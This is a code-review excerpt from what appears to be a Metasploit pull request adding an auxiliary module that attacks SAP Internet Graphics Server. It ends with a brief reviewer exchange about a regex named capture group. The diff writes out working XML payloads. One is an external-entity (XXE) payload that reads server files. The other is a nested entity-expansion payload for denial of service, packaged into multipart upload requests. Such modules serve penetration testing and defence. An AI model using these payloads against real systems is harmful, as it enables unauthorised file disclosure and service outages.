modules/auxiliary/admin/sap/sap_igs_xxe.rb

```diff
@@ -0,0 +1,343 @@
+    </ChartData>)
+    @xxe_xml = {
+      name: 'custo',
+      filename: Rex::Text.rand_text_alphanumeric(12) + '.xml',
+      data: nil
+    }
+  end
+
+  def make_xxe_xml(file_name)
+    get_variables
+    entity = Rex::Text.rand_text_alpha(5)
+    @xxe_xml[:data] = %(<?xml version='1.0' encoding='UTF-8'?>
+    <!DOCTYPE Extension [<!ENTITY #{entity} SYSTEM "#{file_name}">]>
+    <SAPChartCustomizing version="1.1">
+      <Elements>
+        <ChartElements>
+          <Title>
+            <Extension>&#{entity};</Extension>
+          </Title>
+        </ChartElements>
+      </Elements>
+    </SAPChartCustomizing>)
+  end
+
+  def make_post_data(file_name, dos = false)
+    get_variables
+
+    if !dos
+      make_xxe_xml(file_name)
+    else
+      @xxe_xml[:data] = %(<?xml version='1.0' encoding='UTF-8'?>
+    <!DOCTYPE Extension [
+      <!ENTITY dos 'dos'>
+      <!ENTITY dos1 '&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;'>
+      <!ENTITY dos2 '&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;'>
+      <!ENTITY dos3 '&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;'>
+      <!ENTITY dos4 '&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;'>
+      <!ENTITY dos5 '&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;'>
+      <!ENTITY dos6 '&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;'>
+      <!ENTITY dos7 '&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;'>
+      <!ENTITY dos8 '&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;'>
+    ]>
+    <SAPChartCustomizing version="1.1">
+      <Elements>
+        <ChartElements>
+          <Title>
+            <Extension>&dos8;</Extension>
+          </Title>
+        </ChartElements>
+      </Elements>
+    </SAPChartCustomizing>)
+    end
+
+    @post_data = Rex::MIME::Message.new
+    @post_data.add_part(@data_xml[:data], 'application/xml', nil, "form-data; name=\"#{@data_xml[:name]}\"; filename=\"#{@data_xml[:filename]}\"")
+    @post_data.add_part(@xxe_xml[:data], 'application/xml', nil, "form-data; name=\"#{@xxe_xml[:name]}\"; filename=\"#{@xxe_xml[:filename]}\"")
+  end
+
+  def get_download_link(html_response)
+    if html_response['ImageMap']
+      if (download_link_regex = /ImageMap" href="(?<link>.*)">ImageMap/.match(html_response))
```

Comment:
Do you have an example for what this is trying to match on, cause right now this string is valid and I'm very sure that it is not the string you are trying to match on:

```
ImageMap" href="?<link>asdf">ImageMap
```

Reply:
Nm, my appologies this is a named capture group in Regex and I mistook it for a placeholder or some left over HTML. All good 👍